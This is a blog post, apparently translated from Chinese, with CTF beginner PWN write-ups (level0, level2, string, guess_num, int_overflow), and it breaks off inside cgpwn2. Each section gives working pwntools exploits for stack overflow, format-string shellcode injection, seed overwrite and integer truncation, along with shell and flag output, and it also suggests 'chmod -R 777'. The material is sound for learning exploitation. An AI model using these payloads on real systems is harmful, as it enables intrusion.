{"id":343,"date":"2024-02-04T00:19:23","date_gmt":"2024-02-03T16:19:23","guid":{"rendered":"http:\/\/162.14.82.114\/?p=343"},"modified":"2024-02-04T00:19:23","modified_gmt":"2024-02-03T16:19:23","slug":"%e6%94%bb%e9%98%b2%e4%b8%96%e7%95%8c%e6%96%b0%e6%89%8b%e4%b8%93%e5%8c%ba-pwn","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/343\/02\/04\/2024\/","title":{"rendered":"\u653b\u9632\u4e16\u754c Beginner Zone: PWN"},"content":{"rendered":"<h1>\u653b\u9632\u4e16\u754c Beginner Zone: PWN<\/h1>\n<p>Pwn work usually calls for <code>IDA<\/code>; for its common commands see the article <a href=\"https:\/\/blog.csdn.net\/z786849296\/article\/details\/83211633?spm=1001.2014.3001.5502\">IDA basic usage<\/a>.<\/p>\n<h2>level0<\/h2>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018225.png\" alt=\"image-20240204001639220\" \/><\/p>\n<p>(This screenshot is borrowed; my own got lost at some point, so I am using someone else's for now. \u653b\u9632\u4e16\u754c has changed its UI since, in memory of my departed youth!)<\/p>\n<p>Pwn is a real blind spot for me, so I will follow the write-ups step by step. First download the attachment, inspect it, then run it:<\/p>\n<pre><code class=\"language-bash\">pwn@whoami:~\/\u684c\u9762$ checksec a\n[*] &#039;\/home\/p\/\u684c\u9762\/a&#039;\n    Arch:     amd64-64-little\n    RELRO:    No RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)\npwn@whoami:~\/\u684c\u9762$ .\/a\nHello, World<\/code><\/pre>\n<p>It is a 64-bit binary. Open it in <code>IDA<\/code>:<\/p>\n<p>Press <code>F5<\/code> to view the C pseudocode; the <code>vulnerable_function()<\/code> function has an obvious stack buffer overflow: <code>read()<\/code> accepts 0x200 bytes into a buffer that sits only 0x80 bytes below <code>rbp<\/code>.<\/p>\n<pre><code class=\"language-c\">\/\/ IDA pseudocode: read() accepts 0x200 bytes into a buffer 0x80 bytes below the saved rbp\nssize_t vulnerable_function()\n{\n  char buf; \/\/ [rsp+0h] [rbp-80h]\n\n  return read(0, &amp;buf, 0x200uLL);\n}<\/code><\/pre>\n<p>Looking further, there are some odd things: the <code>callsystem<\/code> function contains <code>\/bin\/sh<\/code>:<\/p>\n<pre><code class=\"language-c\">int callsystem()\n{\n  return system(&quot;\/bin\/sh&quot;);\n}<\/code><\/pre>\n<p>By overwriting the return address with the address of <code>callsystem()<\/code>, whose body calls <code>system(&quot;\/bin\/sh&quot;)<\/code>, we get a system shell.<\/p>\n<p>Constructing the exploit: I am not good at writing these myself, so I borrow the <a href=\"https:\/\/www.cnblogs.com\/at0de\/p\/11269120.html\">expert's<\/a> directly!<\/p>\n<pre><code class=\"language-python\">from pwn import *\np = remote(&#039;111.200.241.244&#039;,55359)\np.send(&#039;a&#039;*0x88+p64(0x400596))\np.interactive() <\/code><\/pre>\n<p>But here it errors out:<\/p>\n<pre><code class=\"language-bash\">pwn@whoami:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 55359: Done\nTraceback (most recent call last):\n  File &quot;exp.py&quot;, line 3, in &lt;module&gt;\n    p.send(&#039;a&#039;*0x88+p64(0x400596))\nTypeError: can only concatenate str (not &quot;bytes&quot;) to str\n[*] Closed connection to 111.200.241.244 port 55359<\/code><\/pre>\n<p>Searching for this error, I found that appending <code>.decode(&#039;unicode_escape&#039;)<\/code> to <code>p64(0x400596)<\/code> is enough. The cause is that under Python 3 <code>p64()<\/code> returns <code>bytes<\/code> while <code>&#039;a&#039;*0x88<\/code> is a <code>str<\/code>; the decode turns the eight packed bytes back into a <code>str<\/code> that pwntools re-encodes as ISO-8859-1 on send (hence the warning below), so the original byte values survive. Using byte literals throughout (<code>b&#039;a&#039;*0x88+p64(0x400596)<\/code>) avoids the round trip altogether.<\/p>\n<pre><code class=\"language-bash\">pwn@whoami:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 55359: Done\nexp.py:3: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  p.send(&#039;a&#039;*0x88+p64(0x400596).decode(&#039;unicode_escape&#039;))\n[*] Switching to interactive mode\nHello, World\n$ ls\nbin\ndev\nflag\nlevel0\nlib\nlib32\nlib64\n$ cat flag\ncyberpeace{776f9e83fc7fd1774e8abed1e3d030e2}<\/code><\/pre>\n<h2>level2<\/h2>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018227.png\" alt=\"image-20220211114511369\" \/><\/p>\n<p>The challenge description already hints at using <a href=\"https:\/\/baijiahao.baidu.com\/s?id=1665277270769279870&amp;wfr=spider&amp;for=pc\">ROP<\/a>; first look up what that is:<\/p>\n<blockquote>\n<p>ROP stands for Return-oriented programming. It is an advanced memory attack technique that can be used to bypass the various generic defenses of modern operating systems (such as non-executable memory and code signing). From the previous article, Stack overflow vulnerability principles explained and exploited, we saw that the control point of a stack overflow is the ret instruction, so the core idea of ROP is to use instruction sequences ending in ret to change the return address on the stack that should be loaded into EIP to the value we need, and thereby control the program's execution flow.<\/p>\n<\/blockquote>\n<p>Check the binary's protections and how it runs:<\/p>\n<pre><code class=\"language-bash\">pwn@ubuntu:~\/\u684c\u9762$ checksec 1\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/1&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)\npwn@ubuntu:~\/\u684c\u9762$ .\/1\nInput:\n111\nHello World!<\/code><\/pre>\n<p>There is an input point; throw it into IDA:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018229.png\" alt=\"image-20220211121005085\" \/><\/p>\n<p>Open the main function:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018230.png\" alt=\"image-20220211125117940\" \/><\/p>\n<p>Step into <code>vulnerable_function()<\/code> and <code>system()<\/code>:<\/p>\n<pre><code class=\"language-c\">\/\/vulnerable_function(): read() accepts 0x100 bytes into a buffer 0x88 bytes below the saved ebp\nssize_t vulnerable_function()\n{\n  char buf; \/\/ [esp+0h] [ebp-88h]\n\n  system(&quot;echo Input:&quot;);\n  return read(0, &amp;buf, 0x100u);\n}<\/code><\/pre>\n<pre><code class=\"language-c\">\/\/system: thunk that forwards to the imported libc system()\nint system(const char *command)\n{\n  return system(command);\n}<\/code><\/pre>\n<p>Then press <code>shift+F12<\/code> to open the Strings window:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018231.png\" alt=\"image-20220211121759882\" \/><\/p>\n<p>We can try to build a call to <code>system(&quot;\/bin\/sh&quot;)<\/code> from the <code>system<\/code> entry and the <code>\/bin\/sh<\/code> string; here I go straight to <a href=\"https:\/\/www.zhihu.com\/people\/shen-shang-27-14\">\u5e03\u8863<\/a>'s <a href=\"https:\/\/zhuanlan.zhihu.com\/p\/99052062\">script<\/a>:<\/p>\n<pre><code class=\"language-python\">from pwn import *\ncontext.log_level = &#039;debug&#039;\nr = remote(&quot;111.200.241.244&quot;,58123)\nbin_sh = 0x0804A024\nsystem = 0x08048320\nr.recvuntil(&quot;Input:\\n&quot;)\npayload = &#039;a&#039; * (0x88) + &#039;a&#039; * 4 + p32(system).decode(&#039;unicode_escape&#039;)+ p32(0).decode(&#039;unicode_escape&#039;) +p32(bin_sh).decode(&#039;unicode_escape&#039;)  # buf (0x88) + saved ebp (4) + system + fake return address + &quot;\/bin\/sh&quot; pointer\nr.send(payload)\nr.interactive()<\/code><\/pre>\n<p>Run it and we get the flag.<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 58123: Done\nexp.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  r.recvuntil(&quot;Input:\\n&quot;)\n[DEBUG] Received 0x7 bytes:\n    b&#039;Input:\\n&#039;\nexp.py:8: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  r.send(payload)\n[DEBUG] Sent 0x98 bytes:\n    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  \u2502aaaa\u2502aaaa\u2502aaaa\u2502aaaa\u2502\n    *\n    00000080  61 61 61 61  61 61 61 61  61 61 61 61  20 83 04 08  \u2502aaaa\u2502aaaa\u2502aaaa\u2502 \u00b7\u00b7\u00b7\u2502\n    00000090  00 00 00 00  24 a0 04 08                            \u2502\u00b7\u00b7\u00b7\u00b7\u2502$\u00b7\u00b7\u00b7\u2502\n    00000098\n[*] Switching to interactive mode\n$ ls\n[DEBUG] Sent 0x3 bytes:\n    b&#039;ls\\n&#039;\n[DEBUG] Received 0x24 bytes:\n    b&#039;bin\\n&#039;\n    b&#039;dev\\n&#039;\n    b&#039;flag\\n&#039;\n    b&#039;level2\\n&#039;\n    b&#039;lib\\n&#039;\n    b&#039;lib32\\n&#039;\n    b&#039;lib64\\n&#039;\nbin\ndev\nflag\nlevel2\nlib\nlib32\nlib64\n$ cat flag\n[DEBUG] Sent 0x9 bytes:\n    b&#039;cat flag\\n&#039;\n[DEBUG] Received 0x2d bytes:\n    b&#039;cyberpeace{d4a511d80a7187395517501cde6fa398}\\n&#039;\ncyberpeace{d4a511d80a7187395517501cde6fa398}<\/code><\/pre>\n<h2>string<\/h2>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018232.png\" alt=\"image-20220213180959759\" \/><\/p>\n<p>First check the basic info:<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec string\n[*] &#039;\/home\/pwn\/\u684c\u9762\/string&#039;\n    Arch:     amd64-64-little\n    RELRO:    Full RELRO\n    Stack:    Canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)<\/code><\/pre>\n<p>The binary has NX (non-executable stack), CANARY (stack protector) and full RELRO enabled.<\/p>\n<p>Run it and see:<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ .\/string\nWelcome to Dragon Games!\n                                                 .~)&gt;&gt;\n                                               .~))))&gt;&gt;&gt;\n                                             .~))&gt;&gt;             ___\\\n                                           .~))&gt;&gt;)))&gt;&gt;      .-~))&gt;&gt;\\\n                                         .~)))))&gt;&gt;       .-~))&gt;&gt;)&gt;   \n                                       .~)))&gt;&gt;))))&gt;&gt;  .-~)&gt;&gt;)&gt;       \n                   )                 .~))&gt;&gt;))))&gt;&gt;  .-~)))))&gt;&gt;)&gt;\n                ( )@@*)             \/\/)&gt;))))))  .-~))))&gt;&gt;)&gt;\n              ).@(@@               \/\/))&gt;&gt;))) .-~))&gt;&gt;)))))&gt;&gt;)&gt;\n            (( @.@).              \/\/))))) .-~)&gt;&gt;)))))&gt;&gt;)&gt;\n          ))  )@@*.@@ )          \/\/)&gt;))) \/\/))))))&gt;&gt;))))&gt;&gt;)&gt;\n       ((  ((@@@.@@             |\/))))) \/\/)))))&gt;&gt;)))&gt;&gt;)&gt;\n      )) @@*. )@@ )   (\\_(\\  |))&gt;)) \/\/)))&gt;&gt;)))))))&gt;&gt;)&gt;\n    (( @@@(.@(@ .    _\/`-`  ~|b |&gt;))) \/\/)&gt;&gt;)))))))&gt;&gt;)&gt;\n     )* @@@ )@*     (@) (@)  |))) \/\/))))))&gt;&gt;))))&gt;&gt;\n   (( @. )@( @ .   _\/       \/ )) \/\/))&gt;&gt;)))))&gt;&gt;&gt;_._\n    )@@ (@@*)@@.  (6,   6) \/ ^ )\/\/))))))&gt;&gt;)))&gt;&gt;   ~~-.\n ( @jgs@@. @@@.*@_ ~^~^~, \/\\  ^ \/)&gt;&gt;))))&gt;&gt;      _.     `,\n  ((@@ @@@*.(@@ .   \\^^^\/&#039; (  ^  )))&gt;&gt;        .&#039;         `,\n   ((@@).*@@ )@ )    `-&#039;   ((   ^  ~)_          \/             `,\n     (@@. (@@ ).           (((   ^    `\\        |               `.\n       (*.@*              \/ ((((        \\        \\      .         `.\n                         \/   (((((  \\    \\    _.-~\\     Y,         ;\n                        \/   \/ (((((( \\    \\.-~   _.`&quot; _.-~`,       ;\n                       \/   \/   `(((((()    )    (((((~      `,     ;\n                     _\/  _\/      `&quot;&quot;&quot;\/   \/&#039;                  ;     ;\n                 _.-~_.-~           \/  \/&#039;                _.-~   _.&#039;\n               ((((~~              \/ \/&#039;              _.-~ __.--~\n                                  ((((          __.-~ _.-~\n                                              .&#039;   .~~\n                                              :    ,&#039;\n\nwe are wizard, we will give you hand, you can not defeat dragon by yourself ...\nwe will tell you two secret ...\nsecret[0] is de02a0\nsecret[1] is de02a4\ndo not tell anyone \nWhat should your character&#039;s name be:\naaaa\nCreating a new player.\n This is a famous but quite unusual inn. The air is fresh and the\nmarble-tiled ground is clean. Few rowdy guests can be seen, and the\nfurniture looks undamaged by brawls, which are very common in other pubs\nall around the world. The decoration looks extremely valuable and would fit\ninto a palace, but in this city it&#039;s quite ordinary. In the middle of the\nroom are velvet covered chairs and benches, which surround large oaken\ntables. A large sign is fixed to the northern wall behind a wooden bar. In\none corner you notice a fireplace.\nThere are two obvious exits: east, up.\nBut strange thing is ,no one there.\nSo, where you will go?east or up?:<\/code><\/pre>\n<p>If this reports insufficient permissions, use <code>sudo chmod -R 777 [filename]<\/code> to add permissions (<code>chmod +x<\/code> on the single file is all that is actually needed).<\/p>\n<p>Open it in IDA: in <code>sub_400BB9<\/code> there is a format string vulnerability.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018233.png\" alt=\"image-20220215194630987\" \/><\/p>\n<p>In <code>sub_400CA6<\/code> we find the following:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018234.png\" alt=\"image-20220215225404977\" \/><\/p>\n<p>PS: the mmap'd region is executable, so a shell can be obtained by writing shellcode into it.<\/p>\n<p>Notice that the two <code>secret<\/code> values printed at program start are the addresses of <code>a1[0]<\/code> and <code>a1[1]<\/code>.<\/p>\n<p>Now write the script; here I used <a href=\"https:\/\/codeboy.blog.csdn.net\">\u611a\u516c\u642c\u4ee3\u7801<\/a>'s script:<\/p>\n<pre><code class=\"language-python\">from pwn import *\np = remote(&quot;111.200.241.244&quot;, 63170)\np.recvuntil(&#039;secret[0] is &#039;)\n# Read the hex address: slice off the trailing \\n (the leading space was consumed by the recvuntil above);\n# the digits convert directly with int(x, 16) into an integer stored in addr\naddr = int(p.recvuntil(&#039;\\n&#039;)[:-1], 16)\np.recvuntil(&#039;name be:\\n&#039;)\np.sendline(&#039;Yuren&#039;)\np.recvuntil(&#039;up?:\\n&#039;)\np.sendline(&#039;east&#039;)\np.recvuntil(&#039;leave(0)?:&#039;)\np.sendline(&#039;1&#039;)\np.recv()\np.sendline(str(addr))\np.recv()\np.sendline(&#039;%85x%7$n&#039;)\nrec = p.recvuntil(&#039;SPELL\\n&#039;)\ncontext(os=&#039;linux&#039;, arch=&#039;amd64&#039;)\np.sendline(asm(shellcraft.sh()))\np.interactive()<\/code><\/pre>\n<pre><code class=\"language-bash\">$ cat flag\ncyberpeace{e7fe529a83f5bb60339929857b2ea665}<\/code><\/pre>\n<p>For this challenge I strongly recommend reading master <a href=\"https:\/\/blog.csdn.net\/Deeeelete\">Deeeelete<\/a>'s article <a href=\"https:\/\/blog.csdn.net\/Deeeelete\/article\/details\/109707576?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_aa&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_aa&amp;utm_relevant_index=1\">\u653b\u9632\u4e16\u754c PWN-string<\/a> as well as <a href=\"https:\/\/codeboy.blog.csdn.net\/?type=blog\">\u611a\u516c\u642c\u4ee3\u7801<\/a>'s article <a href=\"https:\/\/codeboy.blog.csdn.net\/article\/details\/122553564?spm=1001.2101.3001.6650.1&amp;utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_paycolumn_v3&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_paycolumn_v3&amp;utm_relevant_index=2\">[\u611a\u516c series] January 2022: \u653b\u9632\u4e16\u754c easy problems PWN-003 (string)<\/a><\/p>\n<h2>guess_num<\/h2>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018235.png\" alt=\"image-20220216123235383\" \/><\/p>\n<p>Open the environment and run the attachment:<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec guess_num\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/guess_num&#039;\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    Canary found\n    NX:       NX enabled\n    PIE:      PIE enabled\nPwn@ubuntu:~\/\u684c\u9762$ .\/guess_num \n-------------------------------\nWelcome to a guess number game!\n-------------------------------\nPlease let me know your name!\nYour name:aaa\n-------------Turn:1-------------\nPlease input your guess number:12\n---------------------------------\nGG!<\/code><\/pre>\n<p>Open IDA and look at the main function:<\/p>\n<pre><code class=\"language-c\">__int64 __fastcall main(__int64 a1, char **a2, char **a3)\n{\n  int v4; \/\/ [rsp+4h] [rbp-3Ch]\n  int i; \/\/ [rsp+8h] [rbp-38h]\n  int v6; \/\/ [rsp+Ch] [rbp-34h]\n  char v7; \/\/ [rsp+10h] [rbp-30h]\n  unsigned int seed[2]; \/\/ [rsp+30h] [rbp-10h]\n  unsigned __int64 v9; \/\/ [rsp+38h] [rbp-8h]\n\n  v9 = __readfsqword(0x28u);\n  setbuf(stdin, 0LL);\n  setbuf(stdout, 0LL);\n  setbuf(stderr, 0LL);\n  v4 = 0;\n  v6 = 0;\n  *(_QWORD *)seed = sub_BB0();\n  puts(&quot;-------------------------------&quot;);\n  puts(&quot;Welcome to a guess number game!&quot;);\n  puts(&quot;-------------------------------&quot;);\n  puts(&quot;Please let me know your name!&quot;);\n  printf(&quot;Your name:&quot;, 0LL);\n  gets(&amp;v7); \/\/ unbounded read: seed lies 0x20 bytes past v7\n  srand(seed[0]);\n  for ( i = 0; i &lt;= 9; ++i )\n  {\n    v6 = rand() % 6 + 1;\n    printf(&quot;-------------Turn:%d-------------\\n&quot;, (unsigned int)(i + 1));\n    printf(&quot;Please input your guess number:&quot;);\n    __isoc99_scanf(&quot;%d&quot;, &amp;v4);\n    puts(&quot;---------------------------------&quot;);\n    if ( v4 != v6 )\n    {\n      puts(&quot;GG!&quot;);\n      exit(1);\n    }\n    puts(&quot;Success!&quot;);\n  }\n  sub_C3E();\n  return 0LL;\n}<\/code><\/pre>\n<p>We have to guess the randomly generated number correctly ten times in a row: impossible, absolutely impossible. But the random number is a pseudo-random number generated via <code>srand()<\/code>.<\/p>\n<p>seed is an unsigned int, which occupies 4 bytes (four characters) on 64-bit; between the name buffer and seed there are 0x20 bytes, so we can overwrite seed through the name, use a seed of our own choosing, and reproduce exactly the same random numbers.<\/p>\n<p>Use a script directly; here I referred to master <a href=\"https:\/\/blog.csdn.net\/u012890095\">Nathan-Yang<\/a>'s script:<\/p>\n<pre><code class=\"language-python\">from pwn import *\nfrom ctypes import *\nio = remote(&#039;111.200.241.244&#039;, 55184)\nlibc = cdll.LoadLibrary(&quot;\/lib\/x86_64-linux-gnu\/libc.so.6&quot;)  # local glibc rand() reproduces the remote sequence for the same seed\npayload = &#039;a&#039; * 0x20 + p64(1).decode()  # 0x20 bytes of name, then seed = 1 (p64 gives bytes; decode for str concatenation)\nio.recvuntil(&#039;Your name:&#039;)\nio.sendline(payload)\nlibc.srand(1)\nfor i in range(10):\n    num = str(libc.rand()%6+1)\n    io.recvuntil(&#039;number:&#039;)\n    io.sendline(num)\nio.interactive()<\/code><\/pre>\n<p>Run it to get the flag:<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ vi exp.py\nPwn@ubuntu:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 55184: Done\nexp.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&#039;Your name:&#039;)\nexp.py:7: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(payload)\nexp.py:11: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&#039;number:&#039;)\nexp.py:12: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(num)\n[*] Switching to interactive mode\n---------------------------------\nSuccess!\nYou are a prophet!\nHere is your flag!cyberpeace{9f895fd6555e868b189d7eae00c8c8b6}\n[*] Got EOF while reading in interactive<\/code><\/pre>\n<h2>int_overflow<\/h2>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018236.png\" alt=\"image-20220216184211818\" \/><\/p>\n<p>Same as usual:<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec int_overflow\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/int_overflow&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)\nPwn@ubuntu:~\/\u684c\u9762$ .\/int_overflow\nbash: .\/int_overflow: \u6743\u9650\u4e0d\u591f\nPwn@ubuntu:~\/\u684c\u9762$ chmod -R 777 int_overflow\nPwn@ubuntu:~\/\u684c\u9762$ .\/int_overflow\n---------------------\n~~ Welcome to CTF! ~~\n       1.Login       \n       2.Exit        \n---------------------\nYour choice:1\nPlease input your username:\nadmin\nHello admin\n\nPlease input your passwd:\npassword\nInvalid Password\nPwn@ubuntu:~\/\u684c\u9762$ .\/int_overflow\n---------------------\n~~ Welcome to CTF! ~~\n       1.Login       \n       2.Exit        \n---------------------\nYour choice:2\nBye~<\/code><\/pre>\n<p>Open it in IDA:<\/p>\n<pre><code class=\"language-c\">\/\/main function\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int v4; \/\/ [esp+Ch] [ebp-Ch]\n\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  setbuf(stderr, 0);\n  puts(&quot;---------------------&quot;);\n  puts(&quot;~~ Welcome to CTF! ~~&quot;);\n  puts(&quot;       1.Login       &quot;);\n  puts(&quot;       2.Exit        &quot;);\n  puts(&quot;---------------------&quot;);\n  printf(&quot;Your choice:&quot;);\n  __isoc99_scanf(&quot;%d&quot;, &amp;v4);\n  if ( v4 == 1 )\n  {\n    login();\n  }\n  else\n  {\n    if ( v4 == 2 )\n    {\n      puts(&quot;Bye~&quot;);\n      exit(0);\n    }\n    puts(&quot;Invalid Choice!&quot;);\n  }\n  return 0;\n}<\/code><\/pre>\n<p>There is a <code>login()<\/code> function; look at it:<\/p>\n<pre><code class=\"language-c\">int login()\n{\n  char buf; \/\/ [esp+0h] [ebp-228h]\n  char s; \/\/ [esp+200h] [ebp-28h]\n  memset(&amp;s, 0, 0x20u);\n  memset(&amp;buf, 0, 0x200u);\n  puts(&quot;Please input your username:&quot;);\n  read(0, &amp;s, 0x19u);\n  printf(&quot;Hello %s\\n&quot;, &amp;s);\n  puts(&quot;Please input your passwd:&quot;);\n  read(0, &amp;buf, 0x199u);\n  return check_passwd(&amp;buf);\n}<\/code><\/pre>\n<p>Continue with the <code>check_passwd()<\/code> function:<\/p>\n<pre><code class=\"language-c\">char *__cdecl check_passwd(char *s)\n{\n  char *result; \/\/ eax\n  char dest; \/\/ [esp+4h] [ebp-14h]\n  unsigned __int8 v3; \/\/ [esp+Fh] [ebp-9h]  strlen() result is truncated to 8 bits here\n  v3 = strlen(s);\n  if ( v3 &lt;= 3u || v3 &gt; 8u )\n  {\n    puts(&quot;Invalid Password&quot;);\n    result = (char *)fflush(stdout);\n  }\n  else\n  {\n    puts(&quot;Success&quot;);\n    fflush(stdout);\n    result = strcpy(&amp;dest, s);\n  }\n  return result;\n}<\/code><\/pre>\n<ul>\n<li><code>v3<\/code> is declared as <code>unsigned __int8 v3<\/code>, an unsigned 8-bit variable whose maximum value is 255.<\/li>\n<li>During the assignment the compiler truncates the result of <code>strlen<\/code> to its low eight bits before storing it. Since the maximum of 8 bits is 255, a passwd string longer than 255 bytes makes the stored value wrap around.<\/li>\n<li>The <code>read<\/code> in the caller accepts up to <code>0x199<\/code> bytes, far more than 255.<\/li>\n<\/ul>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018237.png\" alt=\"image-20220217203523072\" \/><\/p>\n<p>Since the overflowing length is truncated to its low eight bits, we only need to add the originally required 4 to 8 on top of 255; the truncated value then lands in <code>v3<\/code> and the <code>if<\/code> check is bypassed.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018238.png\" alt=\"image-20220217194147104\" \/><\/p>\n<p>Moreover, in the Strings view (<code>shift+F12<\/code>) we can also see <code>cat flag<\/code>:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018239.png\" alt=\"image-20220217205654195\" \/><\/p>\n<p>We can find:<\/p>\n<pre><code class=\"language-c\">int what_is_this()\n{\n  return system(&quot;cat flag&quot;);\n}<\/code><\/pre>\n<p>Knowing the principle, just write the exp:<\/p>\n<pre><code class=\"language-python\">from pwn import *\nio=remote(&quot;111.200.241.244&quot;,64586)\nio.sendlineafter(&quot;Your choice:&quot;, &quot;1&quot;)\nio.sendlineafter(&quot;your username:&quot;, &quot;kk&quot;)\nio.recvuntil(&quot;your passwd:&quot;)\n# dest (0x14) + saved ebp (4) + what_is_this address + padding so strlen() wraps into 4..8 when truncated to 8 bits; p32 returns bytes under Python 3, so decode it for str concatenation\npayload = &quot;a&quot; * 0x14 + &quot;aaaa&quot; + p32(0x0804868B).decode(&#039;unicode_escape&#039;)+&quot;a&quot;*234\nio.sendline(payload)\nio.recv()\nio.interactive()<\/code><\/pre>\n<p>Get the flag:<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 64586: Done\nexp.py:3: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendlineafter(&quot;Your choice:&quot;, &quot;1&quot;)\n\/home\/baoyujie\/.local\/lib\/python3.8\/site-packages\/pwnlib\/tubes\/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  res = self.recvuntil(delim, timeout=timeout)\nexp.py:4: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendlineafter(&quot;your username:&quot;, &quot;kk&quot;)\nexp.py:5: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&quot;your passwd:&quot;)\nexp.py:7: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. 
See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(payload)\n[*] Switching to interactive mode\nSuccess\ncyberpeace{5f5d5aa7b93a146d4f0f4855f819f938}<\/code><\/pre>\n<h2>cgpwn2<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018240.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018240.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220217223157440\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8001\u6837\u5b50\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec cgpwn2\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/cgpwn2&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)\nPwn@ubuntu:~\/\u684c\u9762$ .\/cgpwn2\nplease tell me your name\naaa\nhello,you can leave some message here:\nasd\nthank 